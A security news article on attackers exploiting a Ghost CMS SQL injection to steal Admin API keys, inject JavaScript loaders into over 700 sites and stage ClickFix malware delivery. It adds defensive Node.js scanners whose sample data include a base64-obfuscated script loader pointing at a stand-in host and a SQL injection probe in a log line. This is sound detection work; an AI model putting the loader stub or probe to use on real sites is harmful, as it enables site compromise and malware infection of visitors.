Ghost CMS CVE-2026-26980 Exploited to Hijack 700+ Sites for ClickFix Attack

Threat actors are exploiting a recently disclosed critical flaw in Ghost CMS to inject malicious JavaScript into compromised sites and stage ClickFix attacks against their visitors.
According to QiAnXin XLab, the activity involves exploitation of CVE-2026-26980 (CVSS score: 9.4), an SQL injection vulnerability in Ghost’s Content API that allows an unauthenticated attacker to read arbitrary data from the site’s database. The bug was fixed in February 2026 in version 6.19.1. It was discovered by Anthropic using Claude.
What makes the flaw more dangerous is that the data an attacker can read includes the site’s Admin API key. With that key the attacker can authenticate to the Ghost Admin API and directly modify published articles, poisoning the site with injected code without ever holding a user account.
A threat actor leveraged the flaw to “obtain the target site’s Admin API key without authorization, then use the Ghost Admin API to tamper with articles in bulk, injecting malicious JavaScript loaders at the bottom of pages to facilitate CAPTCHA spoofing attacks,” XLab said.
The Chinese security vendor describes the operation as a “massive poisoning” campaign built on the Ghost CMS flaw. At least two distinct threat clusters are assessed to be behind it, in some cases injecting code into a given site within a single day. The activity was first observed on May 7, 2026.
In total, the campaign has compromised more than 700 websites across the university, blockchain, artificial intelligence, software-as-a-service (SaaS), security research, media and financial technology sectors. Because the lure is served from legitimate, trusted websites, the ClickFix attack is more likely to succeed, XLab said.
The JavaScript injected at the bottom of each article acts as a two-stage loader that retrieves the main payload at runtime from an external domain (“clo4shara[.]xyz/11z77u3.php”). This gives the operators flexibility: they can swap payloads server-side according to their own criteria while the small stub injected into the compromised sites stays identical everywhere.
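As an added example (not code from the XLab report or from Ghost itself), the following Node.js script scans posts as returned by the Ghost Admin API for injected loaders of the kind described above. It relies on the Admin API’s documented post fields (`html`, `codeinjection_head`, `codeinjection_foot`); the sample posts, the script-host allowlist and the loader heuristics are constructed assumptions, not indicators taken from the report.

```javascript
// Added example: scan Ghost posts (shape as returned by the Admin API) for injected
// script loaders. Sample data, allowlist and heuristics are constructed for illustration.

// Assumed allowlist: the CDNs and domains your theme legitimately loads scripts from.
const ALLOWED_SCRIPT_HOSTS = new Set(["cdn.jsdelivr.net", "example-site.test"]);

// Traits of a two-stage loader: it creates a <script> element at runtime, decodes an
// obfuscated string, or evaluates code it fetched. Any one of these inside an inline
// <script> in post content is worth a human look.
const LOADER_PATTERNS = [
  /document\.createElement\s*\(\s*['"]script['"]\s*\)/i,
  /\batob\s*\(/i,
  /\beval\s*\(/i,
  /new\s+Function\s*\(/i,
  /String\.fromCharCode\s*\(/i,
];

// Extract every <script> tag: its src attribute (if any) and its inline body.
function scriptTags(html) {
  const tags = [];
  const re = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = re.exec(html || "")) !== null) {
    const srcMatch = /\bsrc\s*=\s*["']([^"']+)["']/i.exec(m[1]);
    tags.push({ src: srcMatch ? srcMatch[1] : null, body: m[2] });
  }
  return tags;
}

// Resolve relative and protocol-relative src values against the (assumed) site origin.
function hostOf(src) {
  try {
    return new URL(src, "https://example-site.test/").hostname;
  } catch {
    return null; // unparsable src is itself suspicious; caller flags it
  }
}

// Return one finding per suspicious <script> in the post's rendered HTML and per-post
// code injection slots (the "bottom of the page" location the report describes).
function findings(post) {
  const out = [];
  for (const field of ["html", "codeinjection_head", "codeinjection_foot"]) {
    for (const tag of scriptTags(post[field])) {
      if (tag.src) {
        const host = hostOf(tag.src);
        if (!host || !ALLOWED_SCRIPT_HOSTS.has(host)) {
          out.push({ post: post.slug, field, reason: `external script src ${tag.src}` });
        }
      } else {
        const hit = LOADER_PATTERNS.find((p) => p.test(tag.body));
        if (hit) out.push({ post: post.slug, field, reason: `inline loader pattern ${hit}` });
      }
    }
  }
  return out;
}

function scanPosts(posts) {
  return posts.flatMap(findings);
}

// Constructed sample: one clean post, one with a loader in codeinjection_foot
// (the base64 string decodes to a made-up stage-2 URL), one with a foreign script src.
const SAMPLE_POSTS = [
  { slug: "welcome", html: '<p>Hello</p><script src="https://cdn.jsdelivr.net/npm/prismjs"></script>', codeinjection_foot: null },
  { slug: "q2-report", html: "<p>Numbers</p>",
    codeinjection_foot: "<script>var s=document.createElement('script');s.src=atob('aHR0cHM6Ly9sb2FkZXIuaW52YWxpZC8xMXo3N3UzLnBocA==');document.body.appendChild(s);</script>" },
  { slug: "pricing", html: '<p>Pricing</p><script src="https://loader.invalid/stage1.js"></script>' },
];

console.log(JSON.stringify(scanPosts(SAMPLE_POSTS), null, 2));
```

In practice you would feed `scanPosts` the `posts` array from a paginated `GET /ghost/api/admin/posts/?formats=html` call (pages included via the equivalent `pages` endpoint) and also check the site-wide code injection settings, which the Admin API exposes separately from per-post fields.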

“Directly accessing clo4shara[.]xyz/11z77u3.php exposes a piece of code, which is a common traffic distribution script,” XLab explained. “Its main function is to collect various fingerprint information from the user’s browser and upload it to the server, then perform actions such as redirects, hijacks and downloads based on the returned commands.” The PHP script is backed by the cloaking service Adspective.
The purpose of the cloaking script is to ensure that only real victims are served the malicious payload, while security scanners and automated browsers see only the legitimate page. The script also supports 19 commands that allow arbitrary JavaScript to be executed, giving the operator remote control of the victim’s browser.
Visitors who match the targeting criteria are ultimately shown a fake CAPTCHA verification page inside an HTML iframe, asking them to prove they are human. This triggers the ClickFix step: they are instructed to copy a Base64-encoded command and paste it into the Windows Run dialog.
The command acts as a dropper: it downloads a ZIP archive, extracts a Windows batch script from it and runs it. The batch script in turn issues a PowerShell command that downloads a DLL from a remote domain, launches it with “rundll32.exe” and opens a decoy web page to distract the user.
A later iteration of the attack replaces the DLL with a JavaScript payload. Whichever first stage is used, the end goal is to deliver and run a Windows executable. In the DLL variant, that executable is a PuTTY client carrying a valid code-signing certificate; in the JavaScript variant it is an Inno Setup installer for an Electron application.
That application is a modified version of the open-source Grape desktop client, altered to establish persistence and poll a remote server (“web-telegram[.]ug”) every 30 seconds for commands from the attacker, including instructions to execute JavaScript code or executable files.
Ghost CMS users are advised to upgrade to the latest version, rotate all keys and credentials (in particular the Admin API key), remove any injected code from their sites, review access logs for signs of suspicious activity, and notify users who may have visited the site during the period of compromise.
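The advice to review access logs is easier to act on with a concrete triage rule. The script below is an added example, not from the XLab report or from Ghost: it parses nginx combined-format access log lines and flags (a) Content API requests whose query string carries SQL metacharacters, the kind of probe one would expect against CVE-2026-26980, and (b) write requests to the Admin API posts endpoint from addresses outside a trusted allowlist, which is what bulk tampering with a stolen Admin API key would look like. The log lines and the allowlist are constructed; the report does not disclose the injected parameter, so the SQL check is a generic heuristic and will need tuning against your own traffic.

```javascript
// Added example: triage Ghost access logs for SQLi probes against the Content API and
// for Admin API writes from unexpected addresses. Log lines and allowlist are constructed.

// Assumed: the egress addresses your editors legitimately publish from (office, VPN, CI).
const TRUSTED_ADMIN_IPS = new Set(["203.0.113.10"]);

// nginx "combined" format: ip - user [time] "METHOD path HTTP/x" status bytes "referer" "ua"
const LOG_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"$/;

function parseLine(line) {
  const m = LOG_RE.exec(line);
  if (!m) return null;
  return { ip: m[1], time: m[2], method: m[3], path: m[4], status: Number(m[5]), ua: m[6] };
}

// Generic SQL injection tells: quotes (raw or URL-encoded), comment markers, UNION/SELECT,
// time-based probes, and tautologies. Heuristic only; the real vector is not public.
const SQL_PROBE = /('|%27|%22|--|\/\*|\bunion\b|\bselect\b|\bsleep\s*\(|\bor\b\s+\d+\s*=\s*\d+)/i;

function classify(req) {
  const [path, query = ""] = req.path.split("?");
  let decoded;
  try {
    decoded = decodeURIComponent(query);
  } catch {
    decoded = query; // malformed encoding: inspect the raw string instead
  }
  if (path.startsWith("/ghost/api/content/") && SQL_PROBE.test(decoded)) {
    return "content-api-sql-probe";
  }
  const isWrite = ["PUT", "POST", "DELETE"].includes(req.method);
  if (path.startsWith("/ghost/api/admin/posts/") && isWrite && !TRUSTED_ADMIN_IPS.has(req.ip)) {
    return "admin-api-write-untrusted-ip";
  }
  return null;
}

// Run every line through the classifier and keep the ones that trip a rule.
function triage(logText) {
  const hits = [];
  for (const line of logText.split("\n")) {
    const req = parseLine(line.trim());
    if (!req) continue;
    const tag = classify(req);
    if (tag) hits.push({ tag, ip: req.ip, time: req.time, method: req.method, path: req.path });
  }
  return hits;
}

// An address that both probed the Content API and then wrote through the Admin API is the
// strongest signal that the key was extracted and used, as the report describes.
function correlate(hits) {
  const byIp = new Map();
  for (const h of hits) {
    if (!byIp.has(h.ip)) byIp.set(h.ip, new Set());
    byIp.get(h.ip).add(h.tag);
  }
  return [...byIp].filter(([, tags]) => tags.size > 1).map(([ip]) => ip);
}

// Constructed sample log: a probe, a legitimate editor save, the attacker's save, a normal read.
const SAMPLE_LOG = `
198.51.100.7 - - [07/May/2026:03:14:22 +0000] "GET /ghost/api/content/posts/?key=abc123&filter=slug:'+union+select+1--&limit=1 HTTP/1.1" 200 512 "-" "python-requests/2.31"
203.0.113.10 - - [07/May/2026:08:02:11 +0000] "PUT /ghost/api/admin/posts/6639f1c2/ HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
198.51.100.7 - - [07/May/2026:03:20:05 +0000] "PUT /ghost/api/admin/posts/6639f1c2/ HTTP/1.1" 200 4096 "-" "curl/8.5.0"
192.0.2.44 - - [07/May/2026:09:00:00 +0000] "GET /ghost/api/content/posts/?key=abc123&limit=5 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
`;

const hits = triage(SAMPLE_LOG);
console.log(JSON.stringify(hits, null, 2));
console.log("correlated:", correlate(hits));
```

Rotating the Admin API key (the remediation step above) makes any subsequent writes with the old key fail with 401, so a burst of 401s on `/ghost/api/admin/` after rotation is a useful confirmation that the stolen key was still in use.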